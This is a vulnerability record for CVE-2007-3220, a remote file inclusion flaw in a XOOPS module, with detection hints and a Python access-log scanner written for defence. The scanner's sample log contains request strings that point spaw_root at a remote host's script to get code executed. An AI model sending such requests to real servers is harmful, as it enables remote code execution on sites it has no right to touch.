CVE-2007-3220
Published 2007-06-14
Priority: P3 (49) · Severity: medium · CVSS 2.0 base score: 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit indexed (see the exploit-db reference below)
EPSS: 62.75% (99.1th percentile)
PHP remote file inclusion vulnerability in admin/editor2/spaw_control.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this may be a duplicate of CVE-2006-4656.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xoops | cjay_content_module | — | — |
Detection & IOCs (extracted from sources)
- Detect HTTP requests targeting spaw_control.class.php with a URL-based spaw_root parameter, indicating a remote file inclusion attempt.
- The trailing '?' appended to the injected shell URL is a classic RFI technique to nullify the remainder of the include path; look for query strings ending in '?' in the spaw_root parameter.
- Exploitation requires register_globals=ON and magic_quotes=OFF; these server configurations should be flagged as high-risk in combination with this module's presence.
- Exploitation is only possible when PHP register_globals is ON and magic_quotes is OFF — detections should account for this prerequisite environment.
- This CVE may be a duplicate of CVE-2006-4656; correlate findings with that CVE to avoid double-counting incidents.
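The detection hints above can be turned into a log check. The following is an added example written for this page, not code from the record's sources or from the XOOPS project: it scans web-server access-log lines in common log format (an assumption about the log layout), flags requests to spaw_control.class.php whose spaw_root parameter carries a URL rather than a local path, and notes whether the value ends in the trailing '?' described above. The log lines, IP addresses and paths are constructed sample data.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (common log format). Hosts, paths and
# timestamps are made up for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jun/2007:10:01:12 +0000] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://198.51.100.9/s.txt? HTTP/1.1" 200 512
203.0.113.8 - - [14/Jun/2007:10:02:30 +0000] "GET /modules/cjaycontent/index.php?id=3 HTTP/1.1" 200 2048
203.0.113.9 - - [14/Jun/2007:10:03:01 +0000] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=%68ttps%3A%2F%2F198.51.100.10%2Fx.php%3F HTTP/1.1" 200 512
203.0.113.10 - - [14/Jun/2007:10:04:44 +0000] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=/var/www/html/ HTTP/1.1" 200 512
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO".
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
# A spaw_root value beginning with a URL scheme points include() at a remote host.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)
TARGET_SCRIPT = 'spaw_control.class.php'


def inspect_request(target):
    """Return a finding dict if the request target matches the RFI pattern, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(TARGET_SCRIPT):
        return None
    # parse_qs percent-decodes once; a second unquote catches double-encoded values.
    params = parse_qs(parts.query, keep_blank_values=True)
    for raw in params.get('spaw_root', []):
        value = unquote(raw)
        if REMOTE_SCHEME_RE.match(value):
            return {
                'spaw_root': value,
                # Trailing '?' turns the rest of the include path into a query string.
                'trailing_qmark': value.endswith('?'),
            }
    return None


def scan_log(text):
    """Scan access-log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        finding = inspect_request(m['target'])
        if finding:
            finding.update(src=m['src'], ts=m['ts'])
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} spaw_root={f['spaw_root']!r} trailing_qmark={f['trailing_qmark']}")
```

Only the two requests whose spaw_root value starts with a URL scheme are reported; the request with a local directory in spaw_root is not, which keeps the check aligned with the first hint above rather than alerting on every access to the script. As the third and fourth hints say, a hit is only meaningful on a host running the module with register_globals ON and magic_quotes OFF, so the finding should be joined with that configuration state before it is escalated.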
No detection rules found.
No writeups or analysis indexed.
References
- http://osvdb.org/36307
- http://secunia.com/advisories/25665
- http://www.vupen.com/english/advisories/2007/2206
- https://exchange.xforce.ibmcloud.com/vulnerabilities/34856
- https://www.exploit-db.com/exploits/4070